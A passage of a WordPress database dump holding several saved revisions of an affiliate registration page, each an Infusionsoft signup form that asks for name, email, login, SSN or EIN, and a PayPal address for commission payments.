Republic Of Congo">Democratic Republic Of Congo</option><option value="Cook Islands">Cook Islands</option><option value="Costa Rica">Costa Rica</option><option value="Croatia">Croatia</option><option value="Cuba">Cuba</option><option value="Cyprus">Cyprus</option><option value="Czech Republic">Czech Republic</option><option value="Côte D''Ivoire">Côte D''Ivoire</option><option value="Denmark">Denmark</option><option value="Djibouti">Djibouti</option><option value="Dominica">Dominica</option><option value="Dominican Republic">Dominican Republic</option><option value="Ecuador">Ecuador</option><option value="Egypt">Egypt</option><option value="El Salvador">El Salvador</option><option value="Equatorial Guinea">Equatorial Guinea</option><option value="Eritrea">Eritrea</option><option value="Estonia">Estonia</option><option value="Ethiopia">Ethiopia</option><option value="Falkland Islands">Falkland Islands</option><option value="Faroe Islands">Faroe Islands</option><option value="Fiji">Fiji</option><option value="Finland">Finland</option><option value="France">France</option><option value="French Guiana">French Guiana</option><option value="French Polynesia">French Polynesia</option><option value="French Southern Territories">French Southern Territories</option><option value="Gabon">Gabon</option><option value="Gambia">Gambia</option><option value="Georgia">Georgia</option><option value="Germany">Germany</option><option value="Ghana">Ghana</option><option value="Gibraltar">Gibraltar</option><option value="Greece">Greece</option><option value="Greenland">Greenland</option><option value="Grenada">Grenada</option><option value="Guadeloupe">Guadeloupe</option><option value="Guam">Guam</option><option value="Guatemala">Guatemala</option><option value="Guernsey">Guernsey</option><option value="Guinea">Guinea</option><option value="Guinea-Bissau">Guinea-Bissau</option><option value="Guyana">Guyana</option><option value="Haiti">Haiti</option><option value="Heard and McDonald Islands">Heard and McDonald Islands</option><option value="Holy See (Vatican City State)">Holy See (Vatican City State)</option><option value="Honduras">Honduras</option><option value="Hong Kong">Hong Kong</option><option value="Hungary">Hungary</option><option value="Iceland">Iceland</option><option value="India">India</option><option value="Indonesia">Indonesia</option><option value="Iran">Iran</option><option value="Iraq">Iraq</option><option value="Ireland">Ireland</option><option value="Isle of Man">Isle of Man</option><option value="Israel">Israel</option><option value="Italy">Italy</option><option value="Jamaica">Jamaica</option><option value="Japan">Japan</option><option value="Jersey">Jersey</option><option value="Jordan">Jordan</option><option value="Kazakhstan">Kazakhstan</option><option value="Kenya">Kenya</option><option value="Kiribati">Kiribati</option><option value="North Korea">North Korea</option><option value="South Korea">South Korea</option><option value="Kuwait">Kuwait</option><option value="Kyrgyzstan">Kyrgyzstan</option><option value="Laos">Laos</option><option value="Latvia">Latvia</option><option value="Lebanon">Lebanon</option><option value="Lesotho">Lesotho</option><option value="Liberia">Liberia</option><option value="Libya">Libya</option><option value="Liechtenstein">Liechtenstein</option><option value="Lithuania">Lithuania</option><option value="Luxembourg">Luxembourg</option><option value="Macao">Macao</option><option value="Republic of Macedonia">Republic of Macedonia</option><option value="Madagascar">Madagascar</option><option value="Malawi">Malawi</option><option value="Malaysia">Malaysia</option><option value="Maldives">Maldives</option><option value="Mali">Mali</option><option value="Malta">Malta</option><option value="Marshall Islands">Marshall Islands</option><option value="Martinique">Martinique</option><option value="Mauritania">Mauritania</option><option value="Mauritius">Mauritius</option><option value="Mayotte">Mayotte</option><option value="Mexico">Mexico</option><option value="Federated States of Micronesia">Federated States of Micronesia</option><option value="Moldova">Moldova</option><option value="Monaco">Monaco</option><option value="Mongolia">Mongolia</option><option value="Montenegro">Montenegro</option><option value="Montserrat">Montserrat</option><option value="Morocco">Morocco</option><option value="Mozambique">Mozambique</option><option value="Myanmar">Myanmar</option><option value="Namibia">Namibia</option><option value="Nauru">Nauru</option><option value="Nepal">Nepal</option><option value="Netherlands">Netherlands</option><option value="Netherlands Antilles">Netherlands Antilles</option><option value="New Caledonia">New Caledonia</option><option value="New Zealand">New Zealand</option><option value="Nicaragua">Nicaragua</option><option value="Niger">Niger</option><option value="Nigeria">Nigeria</option><option value="Niue">Niue</option><option value="Norfolk Island">Norfolk Island</option><option value="Northern Mariana Islands">Northern Mariana Islands</option><option value="Norway">Norway</option><option value="Oman">Oman</option><option value="Pakistan">Pakistan</option><option value="Palau">Palau</option><option value="Palestine">Palestine</option><option value="Panama">Panama</option><option value="Papua New Guinea">Papua New Guinea</option><option value="Paraguay">Paraguay</option><option value="Peru">Peru</option><option value="Philippines">Philippines</option><option value="Pitcairn">Pitcairn</option><option value="Poland">Poland</option><option value="Portugal">Portugal</option><option value="Puerto Rico">Puerto Rico</option><option value="Qatar">Qatar</option><option value="Romania">Romania</option><option value="Russian Federation">Russian Federation</option><option value="Rwanda">Rwanda</option><option value="Réunion">Réunion</option><option value="St. Barthélemy">St. Barthélemy</option><option value="St. Helena, Ascension and Tristan Da Cunha">St. Helena, Ascension and Tristan Da Cunha</option><option value="St. Kitts And Nevis">St. Kitts And Nevis</option><option value="St. Lucia">St. Lucia</option><option value="St. Martin">St. Martin</option><option value="St. Pierre And Miquelon">St. Pierre And Miquelon</option><option value="St. Vincent And The Grenedines">St. Vincent And The Grenedines</option><option value="Samoa">Samoa</option><option value="San Marino">San Marino</option><option value="Sao Tome and Principe">Sao Tome and Principe</option><option value="Saudi Arabia">Saudi Arabia</option><option value="Senegal">Senegal</option><option value="Serbia">Serbia</option><option value="Seychelles">Seychelles</option><option value="Sierra Leone">Sierra Leone</option><option value="Singapore">Singapore</option><option value="Slovakia">Slovakia</option><option value="Slovenia">Slovenia</option><option value="Solomon Islands">Solomon Islands</option><option value="Somalia">Somalia</option><option value="South Africa">South Africa</option><option value="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option><option value="Spain">Spain</option><option value="Sri Lanka">Sri Lanka</option><option value="Sudan">Sudan</option><option value="Suriname">Suriname</option><option value="Svalbard And Jan Mayen">Svalbard And Jan Mayen</option><option value="Swaziland">Swaziland</option><option value="Sweden">Sweden</option><option value="Switzerland">Switzerland</option><option value="Syrian Arab Republic">Syrian Arab Republic</option><option value="Taiwan">Taiwan</option><option value="Tajikistan">Tajikistan</option><option value="Tanzania">Tanzania</option><option value="Thailand">Thailand</option><option value="Timor-Leste">Timor-Leste</option><option value="Togo">Togo</option><option value="Tokelau">Tokelau</option><option value="Tonga">Tonga</option><option value="Trinidad and Tobago">Trinidad and Tobago</option><option value="Tunisia">Tunisia</option><option value="Turkey">Turkey</option><option value="Turkmenistan">Turkmenistan</option><option value="Turks and Caicos Islands">Turks and Caicos Islands</option><option value="Tuvalu">Tuvalu</option><option value="Uganda">Uganda</option><option value="Ukraine">Ukraine</option><option value="United Arab Emirates">United Arab Emirates</option><option value="United Kingdom">United Kingdom</option><option value="United States">United States</option><option value="US Minor Outlying Islands">US Minor Outlying Islands</option><option value="Uruguay">Uruguay</option><option value="Uzbekistan">Uzbekistan</option><option value="Vanuatu">Vanuatu</option><option value="Venezuela">Venezuela</option><option value="Viet Nam">Viet Nam</option><option value="Virgin Islands, British">Virgin Islands, British</option><option value="Virgin Islands, U.S.">Virgin Islands, U.S.</option><option value="Wallis and Futuna">Wallis and Futuna</option><option value="Western Sahara">Western Sahara</option><option value="Yemen">Yemen</option><option value="Zambia">Zambia</option><option value="Zimbabwe">Zimbabwe</option></select></td>\n</tr>\n</tbody>\n</table>\n</div>\n<div></div>\n<div></div>\n<div></div>\n<div>\n<div class="text">\n<div class="text">\n\nChoose a Username of approximately 4 to 8 letters. Enter either your SSN or EIN # below.\n\n&nbsp;\n\n</div>\n</div>\n</div>\n<div>\n<div>\n<table class="infusion-field-container" style="width: 100%;">\n<tbody>\n<tr>\n<td class="infusion-field-label-container"><label for="inf_other_Username">Username *</label></td>\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_other_Username" class="infusion-field-input-container" name="inf_other_Username" type="text" /></td>\n</tr>\n</tbody>\n</table>\n<table class="infusion-field-container" style="width: 100%;">\n<tbody>\n<tr>\n<td class="infusion-field-label-container"><label for="inf_other_Password">Password *</label></td>\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_other_Password" class="infusion-field-input-container" name="inf_other_Password" type="password" /></td>\n</tr>\n</tbody>\n</table>\n<table class="infusion-field-container" style="width: 100%;">\n<tbody>\n<tr>\n<td class="infusion-field-label-container"><label for="inf_other_RetypePassword">Confirm Password *</label></td>\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_other_RetypePassword" class="infusion-field-input-container" name="inf_other_RetypePassword" type="password" /></td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n<div>\n<table class="infusion-field-container" style="width: 100%;">\n<tbody>\n<tr>\n<td class="infusion-field-label-container"><label for="inf_field_SSN">SSN *</label></td>\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_field_SSN" class="infusion-field-input-container" name="inf_field_SSN" type="text" /></td>\n</tr>\n</tbody>\n</table>\n</div>\n<div>\n<table class="infusion-field-container" style="width: 100%;">\n<tbody>\n<tr>\n<td class="infusion-field-label-container"><label for="inf_custom_EIN">EIN #</label></td>\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_custom_EIN" class="infusion-field-input-container" name="inf_custom_EIN" type="text" /></td>\n</tr>\n</tbody>\n</table>\n</div>\n<div></div>\n<div></div>\n<div></div>\n<div>\n<table class="infusion-field-container" style="width: 100%;">\n<tbody>\n<tr>\n<td class="infusion-field-input-container" style="width: 400px;"><span class="infusion-option"><input id="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" style="margin-right: 3px;" checked="checked" name="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" type="checkbox" value="976" /><label for="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow">Please Mail My Commission Payment to the Paypal Email Address Below:</label></span></td>\n</tr>\n</tbody>\n</table>\n</div>\n<div>\n<table class="infusion-field-container" style="width: 100%;">\n<tbody>\n<tr>\n<td class="infusion-field-label-container"><label for="inf_custom_PaypalEmailAddress">Paypal Email Address *</label></td>\n<td class="infusion-field-input-container" style="width: 400px;"><input id="inf_custom_PaypalEmailAddress" class="infusion-field-input-container" name="inf_custom_PaypalEmailAddress" type="text" /></td>\n</tr>\n</tbody>\n</table>\n</div>\n<div></div>\n<div>\n<div class="infusion-submit" style="text-align: center;"><button type="submit" value="Register!">Register!</button></div>\n</div></td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</div>\n</form></div>', 'Affiliate Area', '', 'inherit', 'closed', 'open', '', '928-autosave-v1', '', '', '2014-07-30 09:52:16', '2014-07-30 14:52:16', '', 928, 'http://clearyourbeliefs.com/928-autosave-v1', 0, 'revision', '', 0),
(1268, 4194, '2014-07-12 15:28:31', '2014-07-12 20:28:31', '<h1 style="text-align: center;">Affiliate Registration</h1>\r\n<div class="icon_box style="><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/3f71c00a94d36f3139b9a849b793215b" method="POST"><input name="inf_form_xid" type="hidden" value="3f71c00a94d36f3139b9a849b793215b" /><input name="inf_form_name" type="hidden" value="CYB Referall Partner Registration" />\r\n\r\n<input name="infusionsoft_version" type="hidden" value="1.31.0.33" />\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Username">Username *</label>\r\n\r\n<input id="inf_other_Username" class="infusion-field-input-container" name="inf_other_Username" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Password">Password *</label>\r\n\r\n<input id="inf_other_Password" class="infusion-field-input-container" name="inf_other_Password" type="password" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_RetypePassword">Confirm Password *</label>\r\n\r\n<input id="inf_other_RetypePassword" class="infusion-field-input-container" name="inf_other_RetypePassword" type="password" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_NotifyOnLead">Notify on Lead</label>\r\n<div class="infusion-radio">\r\n\r\n&nbsp;\r\n\r\n<input id="inf_other_NotifyOnLead_1" name="inf_other_NotifyOnLead" type="radio" value="1" />\r\n\r\n<label for="inf_other_NotifyOnLead_1">Yes</label>\r\n\r\n<input id="inf_other_NotifyOnLead_0" name="inf_other_NotifyOnLead" type="radio" value="0" />\r\n\r\n<label for="inf_other_NotifyOnLead_0">No</label>\r\n\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_NotifyOnSale">Notify on Sale</label>\r\n<div class="infusion-radio">\r\n\r\n&nbsp;\r\n\r\n<input id="inf_other_NotifyOnSale_1" name="inf_other_NotifyOnSale" type="radio" value="1" />\r\n\r\n<label for="inf_other_NotifyOnSale_1">Yes</label>\r\n\r\n<input id="inf_other_NotifyOnSale_0" name="inf_other_NotifyOnSale" type="radio" value="0" />\r\n\r\n<label for="inf_other_NotifyOnSale_0">No</label>\r\n\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n<div class="infusion-field">\r\n\r\n&nbsp;\r\n\r\n<input id="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" checked="checked" name="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" type="checkbox" value="976" />\r\n\r\n<label for="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow">Please Mail My Commission Payment to the Paypal Email Address Below:</label>\r\n\r\n&nbsp;\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_PaypalEmailAddress">Paypal Email Address *</label>\r\n\r\n<input id="inf_custom_PaypalEmailAddress" class="infusion-field-input-container" name="inf_custom_PaypalEmailAddress" type="text" />\r\n\r\n</div>\r\n<div class="infusion-submit">\r\n\r\n<input type="submit" value="Register!" />\r\n\r\n</div>\r\n</form></div>', 'Affiliate Area', '', 'inherit', 'closed', 'open', '', '928-revision-v1', '', '', '2014-07-12 15:28:31', '2014-07-12 20:28:31', '', 928, 'http://clearyourbeliefs.com/928-revision-v1', 0, 'revision', '', 0),
(1269, 4194, '2014-07-12 15:35:31', '2014-07-12 20:35:31', '<h1 style="text-align: center;">Affiliate Registration</h1>\r\n<div class="icon_box style="><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/3f71c00a94d36f3139b9a849b793215b" method="POST"><input name="inf_form_xid" type="hidden" value="3f71c00a94d36f3139b9a849b793215b" /><input name="inf_form_name" type="hidden" value="CYB Referall Partner Registration" /><input name="infusionsoft_version" type="hidden" value="1.31.0.33" />\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Username">Username *</label>\r\n\r\n<input id="inf_other_Username" class="infusion-field-input-container" name="inf_other_Username" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Password">Password *</label>\r\n\r\n<input id="inf_other_Password" class="infusion-field-input-container" name="inf_other_Password" type="password" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_RetypePassword">Confirm Password *</label>\r\n\r\n<input id="inf_other_RetypePassword" class="infusion-field-input-container" name="inf_other_RetypePassword" type="password" />\r\n\r\n</div>\r\n<label for="inf_other_NotifyOnLead">Notify on Lead</label><label for="inf_other_NotifyOnSale">Notify on Sale</label>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><input id="inf_other_NotifyOnLead_1" name="inf_other_NotifyOnLead" type="radio" value="1" />\r\n\r\n<label for="inf_other_NotifyOnLead_1">Yes</label></td>\r\n<td><input id="inf_other_NotifyOnLead_0" name="inf_other_NotifyOnLead" type="radio" value="0" />\r\n\r\n<label for="inf_other_NotifyOnLead_0">No</label></td>\r\n</tr>\r\n<tr>\r\n<td><input id="inf_other_NotifyOnSale_1" name="inf_other_NotifyOnSale" type="radio" value="1" />\r\n\r\n<label for="inf_other_NotifyOnSale_1">Yes</label></td>\r\n<td><input id="inf_other_NotifyOnSale_0" name="inf_other_NotifyOnSale" type="radio" value="0" />\r\n\r\n<label for="inf_other_NotifyOnSale_0">No</label></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<div class="infusion-field">\r\n\r\n&nbsp;\r\n\r\n<input id="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" checked="checked" name="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" type="checkbox" value="976" />\r\n\r\n<label for="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow">Please Mail My Commission Payment to the Paypal Email Address Below:</label>\r\n\r\n&nbsp;\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_PaypalEmailAddress">Paypal Email Address *</label>\r\n\r\n<input id="inf_custom_PaypalEmailAddress" class="infusion-field-input-container" name="inf_custom_PaypalEmailAddress" type="text" />\r\n\r\n</div>\r\n<div class="infusion-submit">\r\n\r\n<input type="submit" value="Register!" />\r\n\r\n</div>\r\n</form></div>', 'Affiliate Area', '', 'inherit', 'closed', 'open', '', '928-revision-v1', '', '', '2014-07-12 15:35:31', '2014-07-12 20:35:31', '', 928, 'http://clearyourbeliefs.com/928-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1267, 4194, '2014-07-12 15:26:18', '2014-07-12 20:26:18', '<h1 style="text-align: center;">Affiliate Registration</h1>\r\n<div class="icon_box style="><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/3f71c00a94d36f3139b9a849b793215b" method="POST"><input name="inf_form_xid" type="hidden" value="3f71c00a94d36f3139b9a849b793215b" />\r\n\r\n<input name="inf_form_name" type="hidden" value="CYB Referall Partner Registration" />\r\n\r\n<input name="infusionsoft_version" type="hidden" value="1.31.0.33" />\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Username">Username *</label>\r\n\r\n<input id="inf_other_Username" class="infusion-field-input-container" name="inf_other_Username" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Password">Password *</label>\r\n\r\n<input id="inf_other_Password" class="infusion-field-input-container" name="inf_other_Password" type="password" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_RetypePassword">Confirm Password *</label>\r\n\r\n<input id="inf_other_RetypePassword" class="infusion-field-input-container" name="inf_other_RetypePassword" type="password" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_NotifyOnLead">Notify on Lead</label>\r\n<div class="infusion-radio">\r\n\r\n&nbsp;\r\n\r\n<input id="inf_other_NotifyOnLead_1" name="inf_other_NotifyOnLead" type="radio" value="1" />\r\n\r\n<label for="inf_other_NotifyOnLead_1">Yes</label>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<input id="inf_other_NotifyOnLead_0" name="inf_other_NotifyOnLead" type="radio" value="0" />\r\n\r\n<label for="inf_other_NotifyOnLead_0">No</label>\r\n\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_NotifyOnSale">Notify on Sale</label>\r\n<div class="infusion-radio">\r\n\r\n&nbsp;\r\n\r\n<input id="inf_other_NotifyOnSale_1" name="inf_other_NotifyOnSale" type="radio" value="1" />\r\n\r\n<label for="inf_other_NotifyOnSale_1">Yes</label>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<input id="inf_other_NotifyOnSale_0" name="inf_other_NotifyOnSale" type="radio" value="0" />\r\n\r\n<label for="inf_other_NotifyOnSale_0">No</label>\r\n\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n<div class="infusion-field">\r\n\r\n&nbsp;\r\n\r\n<input id="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" checked="checked" name="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" type="checkbox" value="976" />\r\n\r\n<label for="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow">Please Mail My Commission Payment to the Paypal Email Address Below:</label>\r\n\r\n&nbsp;\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_PaypalEmailAddress">Paypal Email Address *</label>\r\n\r\n<input id="inf_custom_PaypalEmailAddress" class="infusion-field-input-container" name="inf_custom_PaypalEmailAddress" type="text" />\r\n\r\n</div>\r\n<div class="infusion-submit">\r\n\r\n<input type="submit" value="Register!" />\r\n\r\n</div>\r\n</form></div>', 'Affiliate Area', '', 'inherit', 'closed', 'open', '', '928-revision-v1', '', '', '2014-07-12 15:26:18', '2014-07-12 20:26:18', '', 928, 'http://clearyourbeliefs.com/928-revision-v1', 0, 'revision', '', 0),
(1270, 4194, '2014-07-12 15:48:00', '2014-07-12 20:48:00', '<h1 style="text-align: center;">Affiliate Registration</h1>\r\n<div class="icon_box style="><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/3f71c00a94d36f3139b9a849b793215b" method="POST"><input name="inf_form_xid" type="hidden" value="3f71c00a94d36f3139b9a849b793215b" /><input name="inf_form_name" type="hidden" value="CYB Referall Partner Registration" /><input name="infusionsoft_version" type="hidden" value="1.31.0.33" />\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Username">Username *</label>\r\n\r\n<input id="inf_other_Username" class="infusion-field-input-container" name="inf_other_Username" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Password">Password *</label>\r\n\r\n<input id="inf_other_Password" class="infusion-field-input-container" name="inf_other_Password" type="password" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_RetypePassword">Confirm Password *</label>\r\n\r\n<input id="inf_other_RetypePassword" class="infusion-field-input-container" name="inf_other_RetypePassword" type="password" />\r\n\r\n</div>\r\n\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><label for="inf_other_NotifyOnLead">Notify on Lead</label></td><td><input id="inf_other_NotifyOnLead_1" name="inf_other_NotifyOnLead" type="radio" value="1" /><label for="inf_other_NotifyOnLead_1">Yes</label></td>\r\n<td><input id="inf_other_NotifyOnLead_0" name="inf_other_NotifyOnLead" type="radio" value="0" /><label for="inf_other_NotifyOnLead_0">No</label></td>\r\n</tr>\r\n<tr>\r\n<td><label for="inf_other_NotifyOnSale">Notify on Sale</label></td><td><input id="inf_other_NotifyOnSale_1" name="inf_other_NotifyOnSale" type="radio" value="1" /><label for="inf_other_NotifyOnSale_1">Yes</label></td>\r\n<td><input id="inf_other_NotifyOnSale_0" name="inf_other_NotifyOnSale" type="radio" value="0" /><label for="inf_other_NotifyOnSale_0">No</label></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<div class="infusion-field">\r\n\r\n&nbsp;\r\n\r\n<input id="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" checked="checked" name="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" type="checkbox" value="976" />\r\n\r\n<label for="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow">Please Mail My Commission Payment to the Paypal Email Address Below:</label>\r\n\r\n&nbsp;\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_PaypalEmailAddress">Paypal Email Address *</label>\r\n\r\n<input id="inf_custom_PaypalEmailAddress" class="infusion-field-input-container" name="inf_custom_PaypalEmailAddress" type="text" />\r\n\r\n</div>\r\n<div class="infusion-submit">\r\n\r\n<input type="submit" value="Register!" />\r\n\r\n</div>\r\n</form></div>', 'Affiliate Area', '', 'inherit', 'closed', 'open', '', '928-revision-v1', '', '', '2014-07-12 15:48:00', '2014-07-12 20:48:00', '', 928, 'http://clearyourbeliefs.com/928-revision-v1', 0, 'revision', '', 0),
(1271, 4194, '2014-07-12 15:57:26', '2014-07-12 20:57:26', '<h1 style="text-align: center;">Affiliate Registration</h1>\r\n<div class="icon_box style="><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/3f71c00a94d36f3139b9a849b793215b" method="POST"><input name="inf_form_xid" type="hidden" value="3f71c00a94d36f3139b9a849b793215b" /><input name="inf_form_name" type="hidden" value="CYB Referall Partner Registration" /><input name="infusionsoft_version" type="hidden" value="1.31.0.33" />\r\n<table>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Username">Username *</label>\r\n\r\n<input id="inf_other_Username" class="infusion-field-input-container" name="inf_other_Username" type="text" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Password">Password *</label>\r\n\r\n<input id="inf_other_Password" class="infusion-field-input-container" name="inf_other_Password" type="password" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_RetypePassword">Confirm Password *</label>\r\n\r\n<input id="inf_other_RetypePassword" class="infusion-field-input-container" name="inf_other_RetypePassword" type="password" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td><label for="inf_other_NotifyOnLead">Notify on Lead</label></td><td><input id="inf_other_NotifyOnLead_1" name="inf_other_NotifyOnLead" type="radio" value="1" /><label for="inf_other_NotifyOnLead_1">Yes</label></td>\r\n<td><input id="inf_other_NotifyOnLead_0" name="inf_other_NotifyOnLead" type="radio" value="0" /><label for="inf_other_NotifyOnLead_0">No</label></td>\r\n</tr>\r\n<tr>\r\n<td><label for="inf_other_NotifyOnSale">Notify on Sale</label></td><td><input id="inf_other_NotifyOnSale_1" name="inf_other_NotifyOnSale" type="radio" value="1" /><label for="inf_other_NotifyOnSale_1">Yes</label></td>\r\n<td><input id="inf_other_NotifyOnSale_0" name="inf_other_NotifyOnSale" type="radio" value="0" /><label for="inf_other_NotifyOnSale_0">No</label></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<div class="infusion-field">\r\n\r\n&nbsp;\r\n\r\n<input id="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" checked="checked" name="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" type="checkbox" value="976" />\r\n\r\n<label for="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow">Please Mail My Commission Payment to the Paypal Email Address Below:</label>\r\n\r\n&nbsp;\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_PaypalEmailAddress">Paypal Email Address *</label>\r\n\r\n<input id="inf_custom_PaypalEmailAddress" class="infusion-field-input-container" name="inf_custom_PaypalEmailAddress" type="text" 